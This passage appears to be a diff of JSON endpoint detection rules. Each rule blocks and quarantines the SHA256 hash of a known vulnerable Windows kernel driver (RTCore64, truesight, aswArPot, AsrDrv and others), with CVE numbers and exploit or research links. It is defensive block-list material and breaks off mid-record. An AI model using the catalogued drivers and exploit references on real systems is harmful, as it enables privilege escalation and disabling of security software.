"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459651Z", + "creation_date": "2026-03-23T11:45:30.459655Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459664Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e9b433a33dc72eb2622947b41f01d04a48cd71beac775a88f3f1e4c838090ee8", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "651ca25e-48ff-5848-9ee3-bccc52173c4a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817017Z", + "creation_date": "2026-03-23T11:45:30.817019Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817025Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e928948ee36fa14c99a9147cd3b8d4c8c1917c52b50857d922ac72ed55d1f8e7", + "comment": "Vulnerable Kernel Driver (aka SMARTEIO64.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "654326fb-92f9-5f74-b6ab-3abce2fa978a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613424Z", + "creation_date": "2026-03-23T11:45:29.613426Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613432Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c767a5895119154467ac3fce8e82c20e6538a4e54f6c109001c61f8abd58f9f8", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6544316f-5707-53b9-819f-928dec6519cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607452Z", + "creation_date": "2026-03-23T11:45:29.607455Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607460Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "077aa8ff5e01747723b6d24cc8af460a7a00f30cd3bc80e41cc245ceb8305356", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "655f1e1e-3219-5d48-96a4-dbc9becca136", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619767Z", + "creation_date": "2026-03-23T11:45:29.619769Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619774Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c4ffe4815b5755d2609be21ba53c9157e8f71137f06fe35044406b968b80320", + "comment": "Super 
Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "65698cd5-87c1-544c-8b6c-92365c297401", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835349Z", + "creation_date": "2026-03-23T11:45:30.835352Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835359Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06605cc9d052e471bfe48802dbd85c8fc3dfd0c0746878a42f7659888d4fc191", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6590d364-bed4-538a-b600-88e521308295", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:29.974384Z", + "creation_date": "2026-03-23T11:45:29.974386Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974391Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f642b5e76572b80684d15bf48bb6e2b6d2743171280ab50502284808a515904", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6596fe30-7d44-5bcb-9cb5-17a79f12acbc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.986214Z", + "creation_date": "2026-03-23T11:45:29.986218Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.986224Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d055be2671e136c937f361cef905e295ddb6983526341f1d5f80a16b7655b40", + "comment": "Vulnerable Kernel Driver (aka VBoxUSBMon.sys) [https://www.loldrivers.io/drivers/babe348d-f160-41ec-9db9-2413b989c1f0/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 
"id": "65a6a867-6f41-5395-8c87-e3c751bfd7a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493763Z", + "creation_date": "2026-03-23T11:45:31.493766Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493774Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "283f5edbbe9a4a65a7e421627a23a946233fb4dc9237ab395547f2a30f3d8f08", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "65abc760-c3fe-5026-abab-0d6f56c1dfbc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606558Z", + "creation_date": "2026-03-23T11:45:29.606560Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606565Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ba919c4ab0eff0058547e3b57442212e5d3e34be28d826fc2a191883fa18b6e", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "65b1d504-064e-5d74-b2c7-eddc67b917cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485321Z", + "creation_date": "2026-03-23T11:45:31.485325Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485334Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "402d4ea7e321cf2cfbabc3908043dac1f1da6c630f9380979fcbc6c7a594c4bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "65c04d2a-5d51-51a6-9c1b-3af7b24cc4ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816227Z", + "creation_date": "2026-03-23T11:45:30.816229Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816234Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d1463b7fec911c10a8c96d84eb7c0f9e95fa488d826647a591a38c0593f812a4", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "65c5388f-c34f-5798-b031-229373ee7460", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827489Z", + "creation_date": "2026-03-23T11:45:30.827491Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827497Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"adf94caaaa25cc59790e03095491cfb6cd572045bfafb2eb6d2ec54ee254dfb8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "65c6d37a-5060-5797-a936-93d4d2e12eb5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984157Z", + "creation_date": "2026-03-23T11:45:29.984158Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984164Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f0605dda1def240dc7e14efa73927d6c6d89988c01ea8647b671667b2b167008", + "comment": "Vulnerable Kernel Driver (aka OpenLibSys.sys) [https://www.loldrivers.io/drivers/2e4fedb0-30ed-400d-b4e1-b2b2004c1607/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "65cc3d27-977b-547c-8765-1055e2d15b12", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474650Z", + "creation_date": "2026-03-23T11:45:31.474654Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474663Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb810b820972a5817b7a7e793c3ba15eea67a234f54ed82a9db7ed57d2bce477", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "65dbd266-bd59-5e13-af5c-1197a01cee35", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818408Z", + "creation_date": "2026-03-23T11:45:31.818412Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818421Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b12d0368991e9d93d9fa131dab8d535a0b15f260df062f548f859306a94e932c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "65e6f463-2105-5194-9deb-f8b7c40ea215", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984656Z", + "creation_date": "2026-03-23T11:45:29.984658Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984664Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "21af8e034ca42ab24a5d1623f70de9c66eeea63d72aeb0f1846b1e04dbdf4f51", + "comment": "Vulnerable Kernel Driver (aka BS_I2cIo.sys) [https://www.loldrivers.io/drivers/66be9e0a-9246-4404-b5b5-7fbde351668f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "65ec4d6f-b709-51e3-99d1-74e962ea50fd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980168Z", + "creation_date": "2026-03-23T11:45:29.980170Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980175Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad8fd8300ed375e22463cea8767f68857d9a3b0ff8585fbeb60acef89bf4a7d7", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "65f06645-229d-5bf7-9270-098096e331fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969506Z", + "creation_date": "2026-03-23T11:45:29.969508Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969513Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e89a5a25969953961db2a2a1a5c73c8af48f7af169ac3fd098171556bf0854d", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "65f1ef83-2340-5b41-b65d-2a3120591628", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, 
+ "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816654Z", + "creation_date": "2026-03-23T11:45:30.816656Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816662Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7220924a787b57f757dd84b30bcd53eb11647eb65a94bfb6ffc6773aa6e6f1bf", + "comment": "Vulnerable Kernel Driver (aka avalueio.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "660b63f3-d25c-59cb-9b38-662236b5d029", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832799Z", + "creation_date": "2026-03-23T11:45:30.832801Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832806Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "1fcba19e4897ac0b03116ae3e533a361cfcb7bddba880edbf6bc89b9df056671", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "661269d3-3578-5f07-9b4f-e2b4b589e70b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984191Z", + "creation_date": "2026-03-23T11:45:29.984193Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984199Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f3937451f0170a0aec3033cadceeb86ab30ee3c67add3926e116ccc20c0d9a7", + "comment": "Vulnerable Kernel Driver (aka OpenLibSys.sys) [https://www.loldrivers.io/drivers/2e4fedb0-30ed-400d-b4e1-b2b2004c1607/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6612fecd-6b53-5cf7-8472-498bad7e0729", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818626Z", + "creation_date": "2026-03-23T11:45:31.818629Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818637Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f5a1fa889a6ce70d3ffee1cf2da3ee2b3c0c12a60226fc91fd9df1dae87e56cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "661cff52-c50c-59e2-a650-8bee7d2fc257", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615065Z", + "creation_date": "2026-03-23T11:45:29.615067Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615072Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "952199c28332bc90cfd74530a77ee237967ed32b3c71322559c59f7a42187dc4", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, 
NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6625ded1-3b30-51a2-852c-4ce8f68a7f8a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974178Z", + "creation_date": "2026-03-23T11:45:29.974180Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974185Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 